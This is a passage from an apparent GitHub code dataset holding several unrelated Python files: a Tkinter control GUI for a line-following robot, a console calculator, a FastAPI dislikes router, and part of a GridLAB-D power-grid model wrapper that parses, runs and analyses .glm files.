canvas.create_text(580, 100, text=\"Live motion\", fill=\"black\", font=font_size_24)\n\n\n# Define the toggle_live_motion function before creating live_motion_toggle\ndef toggle_live_motion():\n if live_motion_var.get():\n # Start displaying live motion data\n display_live_motion_data()\n else:\n # Handle turning off live motion (if needed)\n pass\n root.after(100, toggle_live_motion)\n\n\n# Create a variable to store the state of the toggle switch\nlive_motion_var = tk.BooleanVar()\n\n# Create the toggle switch\nlive_motion_toggle = tk.Checkbutton(root, text=\"Enable\", variable=live_motion_var, font=(\"Syne\", 16), bg=\"#ffffff\", command=toggle_live_motion)\nlive_motion_toggle.place(x=650, y=88) # Adjust the coordinates as needed\n\n# Create a list to store live motion data sets\nlive_motion_data = []\n\n# Create a list to store live motion data sets (as a global variable)\nlive_motion_data = []\n\n# Function to display live motion data with animation\ndef display_live_motion_data():\n global live_motion_data # Declare live_motion_data as a global variable\n\n # Get the canvas width and height\n canvas_width = canvas.winfo_width()\n canvas_height = canvas.winfo_height()\n\n # Coordinates for part3\n x_start = 750\n y_start = 130\n\n # Gap between each set of values\n gap = 40\n\n # Add the new data set to the list\n new_data_set = {\n \"command_sent\": json_data[\"command_sent\"], \n \"dac1_duty_cycle\": dac1_duty_cycle, \n \"dac2_duty_cycle\": dac2_duty_cycle, \n }\n \n # Append the new data set and keep only the last 4 data sets\n live_motion_data.append(new_data_set)\n # Ensure that the list contains a maximum of 4 data sets\n if len(live_motion_data) > 4:\n live_motion_data.pop(0) # Remove the oldest data set\n\n # Clear the part3 areax\n canvas.create_rectangle(650, 80,850 ,300, fill=\"white\")\n\n for data_set in live_motion_data:\n # Display the data on part3\n data_text = f\"{data_set['command_sent']} {data_set['dac1_duty_cycle']:.2%} {data_set['dac2_duty_cycle']:.2%}\"\n canvas.create_text(x_start, y_start, text=data_text, fill=\"black\", font=(\"Syne\", 20))\n\n # Move down for the next set of values\n y_start += gap\n\n # Update the GUI\n root.update()\n\n # Pause for a short time to create an animation effect\n time.sleep(0.3) # Adjust the duration as needed\n\n# Coordinates for the \"Quit\" button\nquit_button_x = 823\nquit_button_y = 28\n\n# Create the \"Quit\" button as text without a background\nquit_button_text_item = canvas.create_text(quit_button_x, quit_button_y, text=\"Quit\", fill=\"black\", font=25)\n\ndef quit():\n global test_process # Declare test_process as a global variable\n\n # Terminate the subprocess if it is running\n if test_process and test_process.poll() is None:\n test_process.terminate()\n\n # Exit the Tkinter application\n root.quit() # This will stop the code gracefully\n\n # Wait for the subprocess to complete (timeout: 5 seconds)\n if test_process:\n test_process.wait(timeout=5)\n\ncanvas.tag_bind(quit_button_text_item, '', lambda event: quit())\n\n\n# Create frames within part4 with different variables\nstart_frame = (612, 352, 805, 394) # Start frame\nemergency_stop_frame = (612, 412, 805, 454) # Emergency Stop frame\nnitros_frame = (547, 473, 675, 510) # Nitros frame\ncrawl_frame = (739, 473, 868, 510) # Crawl frame\n\n# Create rounded rectangles for the frames\nround_rectangle(canvas, *start_frame, radius=30, fill=\"#EBEBEB\")\nround_rectangle(canvas, *emergency_stop_frame, radius=30, fill=\"#FE4243\")\nround_rectangle(canvas, *nitros_frame, radius=30, fill=\"#42A4FE\")\nround_rectangle(canvas, *crawl_frame, radius=30, fill=\"#FEA842\")\n\n\n# Add the text \"Start\" to the frame\ncanvas.create_text(708, 373, text=\"START!\", fill=\"black\", font=(\"Syne\", 24))\n\n# Create a larger and more prominent toggle switch within the frame\nstart_toggle_var = tk.BooleanVar()\nstart_toggle = tk.Checkbutton(root, variable=start_toggle_var, onvalue=True, offvalue=False, font=(\"Syne\", 16), bg=\"#EBEBEB\")\nstart_toggle_item = canvas.create_window(769, 374, window=start_toggle)\n\n\n\n# Create the \"Manual Control\" text in part2\nmanual_control_text_item = canvas.create_text(159, 310, text=\"Manual Control\", fill=\"black\", font=(\"Syne\", 24))\n\n# Create a toggle switch for manual control in part2\nmanual_control_toggle_var = tk.BooleanVar()\nmanual_control_toggle = tk.Checkbutton(root, variable=manual_control_toggle_var, onvalue=True, offvalue=False, font=(\"Syne\", 16), bg=\"white\")\nmanual_control_toggle_item = canvas.create_window(269, 310, window=manual_control_toggle)\n\n\nimage = tk.PhotoImage(file='manual.png')\n\n# Create a canvas image item at point (45, 332)\nimage_item = canvas.create_image(45, 332, anchor='nw', image=image)\n\n# Create a vertical slider at coordinates (x=281, y=337)\nvertical_slider = tk.Scale(root, from_=100, to=0, orient='vertical', length=170, troughcolor=\"white\", sliderlength=20,)\nvertical_slider.set(0) # Set the initial value\nvertical_slider_item = canvas.create_window(265, 430, window=vertical_slider)\n\n# Define the coordinates and dimensions for the gauge\ngauge_x = 315\ngauge_y = 435\ngauge_width = 130\ngauge_height = 147\n\n# Create a gauge on the canvas\ngauge = canvas.create_arc(gauge_x, gauge_y, gauge_x + gauge_width, gauge_y + gauge_height, start=0, extent=0, fill=\"#FE4243\", width=2)\n\n# Function to update the gauge with the average value\ndef update_gauge(average_value):\n # Calculate the extent based on the average value (assuming the range is 0-100)\n extent = average_value * 1.8 # Scale the extent for the gauge\n\n # Update the gauge on the canvas\n canvas.itemconfig(gauge, extent=extent)\n\nupdate_gauge(dac2_duty_cycle*100 )\n\n# Define the coordinates and dimensions for the new gauge\nnew_gauge_x = 315\nnew_gauge_y = 350\ngauge_width = 130\ngauge_height = 147\n\n# Create a new gauge on the canvas\nnew_gauge = canvas.create_arc(new_gauge_x, new_gauge_y, new_gauge_x + gauge_width, new_gauge_y + gauge_height, start=0, extent=0, fill=\"#FE4243\", width=2)\n\n# Function to update the new gauge with the average value\ndef update_new_gauge(average_value):\n \n # Calculate the extent based on the average value (assuming the range is 0-100)\n extent = average_value * 1.8 # Scale the extent for the gauge\n\n # Update the new gauge on the canvas\n canvas.itemconfig(new_gauge, extent=extent)\n\n\nupdate_new_gauge(dac1_duty_cycle*100 )\n\ncrawl_button_text_item = canvas.create_text(805, 492, text=\"Snail\", fill=\"#804500\", font=(\"Syne\", 20))\n# Add the \"Emergency Stop\" text to the frame\nemergency_stop_text_item = canvas.create_text(708, 433, text=\"EMERGENCY STOP\", fill=\"#A60000\", font=(\"Syne\", 20))\nnitros_button_text_item = canvas.create_text(612, 492, text=\"Nitros\", fill=\"#00386B\", font=(\"Syne\", 20))\n\ndef update_gui():\n # Read the JSON data from a fil\n try:\n # Read the JSON data from a file\n with open('to_gui.json', 'r') as file:\n json_data = json.load(file)\n except Exception as e:\n # Handle the exception (print an error message or take other actions)\n print(f\"Error: {e}\")\n json_data = {} # Set a default value or an empty dictionary if the JSON loading fails\n\n\n # Update the top bar\n update_top_bar(json_data)\n\n # Update part1\n update_part1(json_data)\n # Use the get method with a default value of 'N/A' for dac1_value\n dac1_value = json_data.get('dac1_value', 'N/A')\n\n # Use the get method with a default value of 'N/A' for dac2_value\n dac2_value = json_data.get('dac2_value', 'N/A')\n\n update_dac_duty_cycles(dac1_value,dac2_value)\n\n \n toggle_live_motion\n # Schedule the update every 1 second\n root.after(100, update_gui)\n\n\n # Define the Emergency Stop button function\n def emergency_stop_action():\n global emergency_stop_status # Make sure to use the global variable\n emergency_stop_status = not emergency_stop_status # Toggle the status\n # Implement the logic to send commands or perform actions based on emergency_stop_status\n if emergency_stop_status:\n # If emergency_stop_status is True, perform the corresponding action\n emergency_stop_status = True\n\n else:\n # If emergency_stop_status is False, perform the corresponding action\n emergency_stop_status = False\n\n\n # Bind the \"Emergency Stop\" button text to the emergency_stop_action function\n canvas.tag_bind(emergency_stop_text_item, '', lambda event: emergency_stop_action())\n\n # Define the Nitros button function\n def nitros_button_action():\n global nitros_on_status # Make sure to use the global variable\n nitros_on_status = not nitros_on_status # Toggle the status\n # Implement the logic to send commands or perform actions based on nitros_on_status\n if nitros_on_status:\n # If nitros_on_status is True, perform the corresponding action\n nitros_on_status = True\n\n else:\n # If nitros_on_status is False, perform the corresponding action\n nitros_on_status = False\n\n\n # Bind the \"Nitros\" button text to the nitros_button_action function\n canvas.tag_bind(nitros_button_text_item, '', lambda event: nitros_button_action())\n\n # Define the Crawl button function\n def crawl_button_action():\n global crawl_on_status # Make sure to use the global variable\n crawl_on_status = not crawl_on_status # Toggle the status\n # Implement the logic to send commands or perform actions based on crawl_on_status\n if crawl_on_status:\n # If crawl_on_status is True, perform the corresponding action\n crawl_on_status = True\n\n else:\n # If crawl_on_status is False, perform the corresponding action\n crawl_on_status = False\n\n\n # Bind the \"Crawl\" button text to the crawl_button_action function\n canvas.tag_bind(crawl_button_text_item, '', lambda event: crawl_button_action())\n\n\n # Function to handle manual control state\n def handle_manual_control():\n global w_status, a_status, s_status, d_status\n if manual_control_toggle_var.get():\n \n # Manual control is enabled\n\n\n def on_key_press(event):\n global w_status, a_status, s_status, d_status\n key = event.keysym\n if key == \"w\":\n # Handle the \"W\" key press (move the car forward)\n w_status = True\n elif key == \"a\":\n # Handle the \"A\" key press (move the car left\n a_status = True\n elif key == \"s\":\n # Handle the \"S\" key press (move the car backward)\n s_status = True\n elif key == \"d\":\n # Handle the \"D\" key press (move the car right)\n \n d_status = True\n\n # Bind key presses to the on_key_press function\n root.bind(\"\", on_key_press)\n\n def on_key_release(event):\n global w_status, a_status, s_status, d_status\n key = event.keysym\n if key == \"w\":\n w_status = False\n elif key == \"a\":\n a_status = False\n elif key == \"s\":\n s_status = False\n elif key == \"d\":\n d_status = False\n\n # Bind key releases to the on_key_release function\n root.bind(\"\", on_key_release)\n\n\n handle_manual_control()\n\n global w_status, a_status, s_status, d_status\n\n data_to_write = {\n \"start_toggle_status\": start_toggle_var.get(), # Get the status of the Start toggle\n \"emergency_stop_status\": emergency_stop_status, \n \"nitros_on_status\": nitros_on_status, \n \"crawl_on_status\": crawl_on_status, \n \"threshold_value\": slider.get(), # Get the value from the slider\n \"manual_toggle_status\": manual_control_toggle_var.get(), # Get the status of the Manual Control toggle\n \"duty_cycle_slider_value\": vertical_slider.get(), # Get the value from the duty cycle slider\n \"w_status\":w_status,\n \"a_status\":a_status,\n \"s_status\":s_status,\n \"d_status\":d_status\n }\n\n json_file_path = 'to_firm.json' # Update this with the actual file path\n\n # Write the data to the JSON file\n with open(json_file_path, 'w') as json_file:\n json.dump(data_to_write, json_file, indent=4) # The 'indent' argument is optional and provides pretty-printing\n\n\n # Update the colors of the Nitros, Crawl, and Emergency Stop buttons based on their status\n if nitros_on_status:\n canvas.itemconfig(nitros_button_text_item, fill=\"#42FE65\") # Change color to green when Nitros is on\n else:\n canvas.itemconfig(nitros_button_text_item, fill=\"#00386B\") # Change color back to the original color\n\n if crawl_on_status:\n canvas.itemconfig(crawl_button_text_item, fill=\"#42FE65\") # Change color to green when Crawl is on\n else:\n canvas.itemconfig(crawl_button_text_item, fill=\"#804500\") # Change color back to the original color\n\n if emergency_stop_status:\n canvas.itemconfig(emergency_stop_text_item, fill=\"#FEA842\") # Change color to orange when Emergency Stop is on\n else:\n canvas.itemconfig(emergency_stop_text_item, fill=\"#A60000\") # Change color back to the original color\n\n\n update_gauge(data_to_write[\"duty_cycle_slider_value\"])\n \n\nupdate_gui()\n# Start the GUI\nroot.mainloop()\n","repo_name":"amiiboii/Line-following-robot-DAC-linear-ramp-comparator-setup.","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":21338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35914492016","text":"while True:\n #define addition operation\n def add():\n #ask user for the first number\n print(\"\\033[1;32m ` \\n\")\n number_1_input = float(input(\"What is the first number? \"))\n #ask the user for seconnd number\n number_2_input = float(input(\"What id your second number? \"))\n #try to run the numbers in the code if the type is correct\n try:\n number_output = number_1_input + number_2_input\n print(\"\\n\" + str(number_output) + \"\\n\")\n except ValueError:\n print(\"That is a string please input an integer\")\n #\n #define subtraction operation\n def subtract():\n #ask user for the first number\n print(\"\\033[1;32m ` \\n\")\n number_1_input = float(input(\"What is yur first number? \"))\n #ask the user for seconnd number\n number_2_input = float(input(\"What is yur second number? \"))\n #try to run the numbers in the code if the type is correct\n try:\n number_output = number_1_input - number_2_input\n print(\"\\n\" + str(number_output) + \"\\n\")\n except ValueError:\n print(\"That is a string please input an integer\") \n #\n #define multiplication operation\n def multiply():\n #ask user for the first number\n print(\"\\033[1;32m ` \\n\")\n number_1_input = float(input(\"What is yur first number? \"))\n #ask the user for seconnd number\n number_2_input = float(input(\"What is yur second number? \"))\n #try to run the numbers in the code if the type is correct\n try:\n number_output = number_1_input * number_2_input\n print(\"\\n\" + str(number_output) + \"\\n\")\n except ValueError:\n print(\"That is a string please input an integer\") \n #\n #define division operation\n def divide():\n #ask user for the first number\n print(\"\\033[1;32m ` \\n\")\n number_1_input = float(input(\"What is yur first number? \"))\n #ask the user for seconnd number\n number_2_input = float(input(\"What is yur second number? \"))\n #try to run the numbers in the code if the type is correct and if it will be a zero division error\n try:\n number_output = number_1_input / number_2_input\n print(\"\\n\" + str(number_output) + \"\\n\")\n except ValueError:\n print(\"That is a string please input an integer\")\n except ZeroDivisionError:\n print(\"The number is being divided by a zero\")\n\n addition_input_list = [\"add\" , \"Add\" , \"ADD\" , \"addition\",\"Addition\" , \"ADDITION\"]\n subtraction_input_list = [\"minus\" , \"Minus\", \"MINUS\" , \"subtract\" , \"Subtraction\" , \"SUBTRACTION\"]\n division_input_list = [\"divide\", \"Divide\", \"DIVIDE\", \"division\" , \"Division\", \"DIVISION\"]\n multiplication_input_list = [\"multiply\", \"Multiply\", \"MULTIPLY\", \"multiplication\", \"Multiplication\", \"MULTIPLICATION\"]\n\n #Ask user on what Operation to do\n print(\"\\033[1;32m ` \\n\")\n print(\"Welcome to my Calculator na pinacomplicated\\n\\nIkaw ba ay mag:\\n\\nAddition\\nSubtraction\\nMultiplication\\nDivision\\n\")\n operation_user_input = str(input(\"What Operation would you like to use?: \"))\n\n if operation_user_input in addition_input_list:\n add()\n elif operation_user_input in subtraction_input_list:\n subtract()\n elif operation_user_input in multiplication_input_list:\n multiply()\n elif operation_user_input in division_input_list:\n divide()\n else:\n print(\"Please input the right operation :)\")\n try_again = input(\"Would you like to calculate again?:\")\n print(\"\\n\")\n yes_user_input = [\"Y\" , \"y\" , \"Yes\" , \"YES\"]\n no_user_input =[\"N\", \"n\" , \"No\" , \"NO\"]\n if try_again in yes_user_input:\n continue\n elif try_again in no_user_input:\n break","repo_name":"MoonHunter99/Calculator-with-error-handling","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38298313358","text":"from typing import List, Union, Dict\nfrom fastapi import Header, APIRouter, HTTPException\n\nfrom reactions.api.models import LikeIn, LikeOut, DislikeIn, DislikeOut\nfrom reactions.api.db_manager import dislikes as db_dislikes\n\nfrom fastapi import Depends\nimport requests\n\ndislikes = APIRouter()\n# verify_video_owner\n\n\n@dislikes.get(\n \"/dislikes-by-video\",\n response_model=List[DislikeOut],\n summary=\"All Dislikes by videos\",\n)\nasync def index(video_id: int):\n return await db_dislikes.get_all_dislikes_by_video(video_id)\n\n\n@dislikes.post(\n \"/add-remove-likes\",\n response_model=Union[DislikeOut, None],\n summary=\"Toggle dislike button and remove like\",\n status_code=201,\n)\nasync def add_remove_dislike(id: int, user=Depends(db_dislikes.get_current_user)):\n return await db_dislikes.add_remove_dislike(id, user)\n","repo_name":"omariut/YT_video_share_library","sub_path":"reactions/api/routers/dislikes.py","file_name":"dislikes.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16125165296","text":"import warnings\nfrom glmpy import glmanip, graph\nimport shutil\nimport subprocess\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport os\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.drawing.nx_agraph import graphviz_layout\nfrom copy import deepcopy, copy\n\n_link_types = [\n 'link', 'overhead_line', 'underground_line', 'triplex_line', 'transformer',\n 'regulator', 'fuse', 'switch', 'recloser', 'relay', 'sectionalizer', 'series_reactor'\n]\n_node_types = ['meter', 'node', 'triplex_node', 'triplex_meter', 'load', 'pqload', 'capacitor', 'recorder',\n 'inverter', 'diesel_dg']\n\n\nclass Gridlabd:\n def __init__(self, file_path=None, base_dir_path=None):\n \"\"\"\n\n Parameters\n ----------\n file_path\n base_dir_path\n \"\"\"\n\n self.model = {}\n self.clock = {}\n self.directives = {}\n self.modules = {}\n self.classes = {}\n self.schedules = {}\n self.file_path = file_path\n self.base_dir_path = base_dir_path\n if file_path is not None:\n self.file_path = Path(file_path)\n if self.base_dir_path is None:\n self.base_dir_path = self.file_path.parent\n self.base_dir_path = Path(self.base_dir_path)\n self.read(self.file_path, self.base_dir_path)\n\n def read(self, file_path, base_dir):\n \"\"\"\n\n Parameters\n ----------\n file_path: str or Path -- path of glm file\n base_dir: str or Path -- path of model base directory,\n\n Returns\n -------\n\n \"\"\"\n self.model, self.clock, self.directives, self.modules, self.classes, self.schedules = \\\n glmanip.parse(glmanip.read(file_path, base_dir))\n\n def write(self, filename):\n glmanip.write(filename, self.model, self.clock, self.directives, self.modules, self.classes, self.schedules)\n\n def swing_nodes(self):\n return self.find_objects_with_property_value('bustype', 'SWING', search_types=['meter', 'node'],\n prepend_class=False)\n\n def find_objects_with_property_value(\n self, obj_property: str, value: str, search_types: list = None, prepend_class=False):\n \"\"\"\n\n Parameters\n ----------\n obj_property: str\n value: str -- value of property\n search_types: list -- optional list of types to search for the object in\n prepend_class: bool -- if true, returned object names will be prepended with the object type e.g. node:node_1\n\n Returns\n -------\n list of object names which have the property with the given value\n\n \"\"\"\n if search_types is None:\n search_types = self.model.keys()\n obj_list = []\n for obj_type in search_types:\n if obj_type in self.model.keys():\n for obj_name in self.model.get(obj_type):\n if self.model[obj_type][obj_name].get(obj_property) == value:\n if prepend_class:\n obj_list.append(obj_type.strip(\"\\'\").strip(\"\\\"\") + ':' + obj_name.strip(\"\\'\").strip(\"\\\"\"))\n else:\n obj_list.append(obj_name)\n return obj_list\n\n def get_object_type(self, obj_name: str, search_types: list = None):\n \"\"\"\n\n Parameters\n ----------\n obj_name: str -- object name\n search_types: list -- optional list of types to search for the object in\n\n Returns\n -------\n name of the class that the object belongs to\n \"\"\"\n if len(obj_name.split(\":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n class_name = obj_name.split(\":\")[0]\n return class_name\n if search_types is None:\n search_types = self.model.keys()\n for class_name in search_types:\n if class_name in self.model.keys():\n if obj_name in self.model[class_name].keys():\n return class_name\n raise Warning(\"Did not find object class\")\n\n def get_object_property_value(self, obj_name: str, obj_property: str, search_types: list = None):\n \"\"\"\n\n Parameters\n ----------\n obj_name: str -- object name\n obj_property: str -- property to get the value of\n search_types: list -- optional list of types to search for the object in\n\n Returns\n -------\n value of property of the object\n \"\"\"\n if len(obj_name.split(\":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n else:\n obj_class = self.get_object_type(obj_name, search_types=search_types)\n if self.model[obj_class].get(obj_name) is None:\n return self.model[obj_class].get('\\\"' + obj_name + '\\\"').get(obj_property)\n return self.model[obj_class][obj_name].get(obj_property)\n\n def get_parent(self, obj_name: str, obj_type: str):\n \"\"\"\n get parent of object\n Parameters\n ----------\n obj_name: str -- name of object\n obj_type: str -- type of object\n\n Returns\n -------\n parent_name: str\n parent_type: str\n \"\"\"\n # 1. get name of parent\n parent_name = self.model[obj_type][obj_name].get('parent')\n # 2. get type of parent\n parent_type = None\n if parent_name is not None:\n parent_type = self.get_object_type(parent_name)\n return parent_name, parent_type\n\n def get_final_parent(self, obj_name: str, obj_type: str):\n \"\"\"\n get ultimate parent of object\n Parameters\n ----------\n obj_name: str -- name of object\n obj_type: str -- type of object\n\n Returns\n -------\n parent_name: str\n parent_type: str\n \"\"\"\n parent_name, parent_type = self.get_parent(obj_name, obj_type)\n if parent_type is not None:\n if self.model[parent_type][parent_name].get('parent') is None:\n return parent_name, parent_type\n else:\n return self.get_final_parent(parent_name, parent_type)\n\n def model_from_comp(self, comp: set):\n model = {}\n for obj_name in comp:\n if len(obj_name.split(\n \":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n else:\n obj_class = self.get_object_type(obj_name)\n # add to model\n if model.get(obj_class) is None:\n model[obj_class] = {}\n if model[obj_class].get(obj_name) is not None:\n warnings.warn(f'Overwriting object, {obj_name}!')\n model[obj_class][obj_name] = self.get(obj_name, obj_class)\n # Find all references to the node:\n\n return model\n\n def get_all(self, obj_names: list):\n model = {}\n for obj_name in obj_names:\n if len(obj_name.split(\n \":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n else:\n obj_class = self.get_object_type(obj_name)\n # add to model\n if model.get(obj_class) is None:\n model[obj_class] = {}\n if model[obj_class].get(obj_name) is not None:\n warnings.warn(f'Overwriting object, {obj_name}!')\n model[obj_class][obj_name] = self.get(obj_name, obj_class)\n return model\n\n def get(self, obj_name: str, obj_class=None):\n \"\"\"\n Parameters\n ----------\n obj_name: str -- object name\n obj_class: str -- optional class of object\n\n Returns\n -------\n object dictionary\n \"\"\"\n if len(obj_name.split(\":\")) == 2: # support receiving obj_name in the form class:obj_name e.g. \"meter:node_2\"\n obj_class = obj_name.split(\":\")[0]\n obj_name = obj_name.split(\":\")[-1]\n elif obj_class is None:\n obj_class = self.get_object_type(obj_name)\n if self.model[obj_class].get(obj_name) is None:\n return self.model[obj_class].get('\\\"' + obj_name + '\\\"')\n return self.model[obj_class][obj_name]\n\n def run(self, tmp_model_path=None, file_names_to_read=None):\n \"\"\"\n Run the model in a temporary directory and read the result files into data frames.\n Parameters\n ----------\n tmp_model_path: str or Path -- directory where temporary directory will be created to store model and outputs\n file_names_to_read: list -- list of names of output files to read\n\n Returns\n -------\n dictionary of results as pandas dataframes\n \"\"\"\n\n # 1. Create temporary directory for storing and running the model\n if tmp_model_path is None:\n if self.base_dir_path is None:\n raise RuntimeError(\"No path is provided to add temporary directory to. Either provide, tmp_model_path \"\n \"or define parameter, base_dir_path\")\n tmp_model_path = self.base_dir_path\n tmp_dir = Path(tmp_model_path) / 'gld_tmp'\n if tmp_dir.exists():\n shutil.rmtree(tmp_dir) # remove old temporary directory\n tmp_dir.mkdir()\n output_name = tmp_dir / 'system.glm'\n # 2. Check for players and copy player files\n if self.model.get('player') is not None:\n player_dir = tmp_dir / 'players'\n player_dir.mkdir()\n for player_name in self.model['player'].keys():\n if self.model['player'][player_name].get('file') is not None:\n old_path_name = (tmp_model_path / Path(self.model['player'][player_name].get('file'))).absolute()\n shutil.copy(old_path_name, player_dir/old_path_name.name)\n self.model['player'][player_name]['file'] = str(Path('players/'+old_path_name.name))\n # 3. Create subdirectory for output files to go to.\n out_dir = tmp_dir / 'output'\n out_dir.mkdir()\n self.change_output_dirs('output')\n\n # 4. Write glm file\n self.write(output_name)\n # 5. Run glm file\n # self.run_gld_on_subprocess(output_name.name, tmp_dir)\n subprocess.run([\"gridlabd\", output_name.name], env=os.environ, cwd=tmp_dir)\n # 6. Read results\n results = {}\n if file_names_to_read is None:\n for file in list(out_dir.glob('*.csv')):\n results[Path(file).name] = self.read_csv(file)\n else:\n for file in file_names_to_read:\n file = Path('output')/file\n results[Path(file).name] = self.read_csv(file)\n return results\n\n def total_load(self):\n minus30 = np.exp(-1j*np.pi/6) # -30 deg\n minus120 = np.exp(-1j*np.pi*2/3) # -120 deg\n delta_to_wye = minus30/np.sqrt(3) * np.array(\n [\n [1, 0, -1*minus120],\n [-1*minus120, 1, 0],\n [0, -1*minus120, 1]\n ]\n )\n s_wye_tot = np.zeros(3, dtype=complex)\n s_del_tot = np.zeros(3, dtype=complex)\n # parse loads as constant p and q loads on each phase using nominal voltage\n for load_name, load in self.model['load'].items():\n v_nom = float(load.get('nominal_voltage'))\n v = np.zeros(3, dtype=complex)\n v[0] = v_nom * (minus120 ** 0)\n v[1] = v_nom * (minus120 ** 1)\n v[2] = v_nom * (minus120 ** 2)\n v_delta = np.sqrt(3)*v*np.exp(1j*np.pi/6)\n s_wye = np.zeros(3, dtype=complex)\n s_delta = np.zeros(3, dtype=complex)\n # Add all types of loads assuming nominal balanced voltages\n\n for i, ph in enumerate('ABC'):\n # Constant PQ WYE connected load:\n s_wye[i] += complex(load.get(f'constant_power_{ph}', complex(0)))\n s_wye[i] += complex(load.get(f'constant_power_{ph}N', complex(0)))\n # Constant current WYE connected load:\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}N', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_wye[i] += (v[i])**2 / complex(load.get(f'constant_impedance_{ph}', complex(0)))\n if f'constant_impedance_{ph}N' in load.keys():\n s_wye[i] += (v[i])**2 / complex(load.get(f'constant_impedance_{ph}N', complex(0)))\n # ZIP Loads\n if f'base_power_{ph}' in load.keys():\n base_power = float(load.get(f'base_power_{ph}'))\n power_pf = float(load.get(f'power_pf_{ph}', 1))\n current_pf = float(load.get(f'current_pf_{ph}', 1))\n impedance_pf = float(load.get(f'impedance_pf_{ph}', 1))\n power_fraction = float(load.get(f'power_fraction_{ph}', 1))\n current_fraction = float(load.get(f'current_fraction_{ph}', 0))\n impedance_fraction = float(load.get(f'impedance_fraction_{ph}', 0))\n p = base_power * (power_fraction * power_pf +\n current_fraction * current_pf +\n impedance_fraction * impedance_pf)\n q = base_power * (power_fraction * np.sin(np.arccos(power_pf)) +\n current_fraction * np.sin(np.arccos(current_pf)) +\n impedance_fraction * np.sin(np.arccos(impedance_pf)))\n s_wye[i] += p + 1j*q\n for i, ph in enumerate(['AB', 'BC', 'CA']):\n # Constant PQ delta connected load:\n s_delta[i] = complex(load.get(f'constant_power_{ph}', complex(0)))\n # Constant current WYE connected load:\n s_delta[i] += v_delta[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_delta[i] += (v_delta[i])**2 / complex(load.get(f'constant_impedance_{ph}', complex(1)))\n # print(f'{load_name}:')\n s_wye_tot += s_wye\n s_del_tot += s_delta\n s_tot = s_wye_tot + delta_to_wye @ s_del_tot\n print(f'Total Load per phase:\\n'\n f'{s_tot}')\n print(f'Total Load:\\n'\n f'{sum(s_tot)}')\n return s_tot\n\n def analyze_loads(self):\n simplified_loads = []\n minus30 = np.exp(-1j*np.pi/6) # -30 deg\n minus120 = np.exp(-1j*np.pi*2/3) # -120 deg\n delta_to_wye = minus30/np.sqrt(3) * np.array(\n [\n [1, 0, -1*minus120],\n [-1*minus120, 1, 0],\n [0, -1*minus120, 1]\n ]\n )\n s_wye_tot = np.zeros(3, dtype=complex)\n s_del_tot = np.zeros(3, dtype=complex)\n # parse loads as constant p and q loads on each phase using nominal voltage\n for load_name, load in self.model['load'].items():\n v_nom = float(load.get('nominal_voltage'))\n v = np.zeros(3, dtype=complex)\n v[0] = v_nom * (minus120 ** 0)\n v[1] = v_nom * (minus120 ** 1)\n v[2] = v_nom * (minus120 ** 2)\n v_delta = np.sqrt(3)*v*np.exp(1j*np.pi/6)\n s_wye = np.zeros(3, dtype=complex)\n s_delta = np.zeros(3, dtype=complex)\n # Add all types of loads assuming nominal balanced voltages\n\n if 'D' not in load.get('phases'):\n for i, ph in enumerate('ABC'):\n # Constant PQ WYE connected load:\n s_wye[i] += complex(load.get(f'constant_power_{ph}', complex(0)))\n s_wye[i] += complex(load.get(f'constant_power_{ph}N', complex(0)))\n # Constant current WYE connected load:\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n s_wye[i] += v[i]*np.conjugate(complex(load.get(f'constant_current_{ph}N', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_wye[i] += \\\n np.abs(v[i])**2 / np.conjugate(complex(load.get(f'constant_impedance_{ph}', complex(0))))\n if f'constant_impedance_{ph}N' in load.keys():\n s_wye[i] += \\\n np.abs(v[i])**2 / np.conjugate(complex(load.get(f'constant_impedance_{ph}N', complex(0))))\n # ZIP Loads\n if f'base_power_{ph}' in load.keys():\n base_power = float(load.get(f'base_power_{ph}'))\n power_pf = float(load.get(f'power_pf_{ph}', 1))\n current_pf = float(load.get(f'current_pf_{ph}', 1))\n impedance_pf = float(load.get(f'impedance_pf_{ph}', 1))\n power_fraction = float(load.get(f'power_fraction_{ph}', 1))\n current_fraction = float(load.get(f'current_fraction_{ph}', 0))\n impedance_fraction = float(load.get(f'impedance_fraction_{ph}', 0))\n p = base_power * (power_fraction * power_pf +\n current_fraction * current_pf +\n impedance_fraction * impedance_pf)\n q = base_power * (power_fraction * np.sin(np.arccos(power_pf)) +\n current_fraction * np.sin(np.arccos(current_pf)) +\n impedance_fraction * np.sin(np.arccos(impedance_pf)))\n s_wye[i] += p + 1j*q\n if \"D\" in load.get('phases'):\n for i, ph in enumerate(['AB', 'BC', 'CA']):\n # Constant PQ delta connected load:\n s_delta[i] = complex(load.get(f'constant_power_{ph}', complex(0)))\n # Constant current WYE connected load:\n s_delta[i] += v_delta[i]*np.conjugate(complex(load.get(f'constant_current_{ph}', complex(0))))\n # Constant impedance WYE connected load\n if f'constant_impedance_{ph}' in load.keys():\n s_delta[i] += np.abs(v_delta[i]) ** 2 / np.conjugate(\n 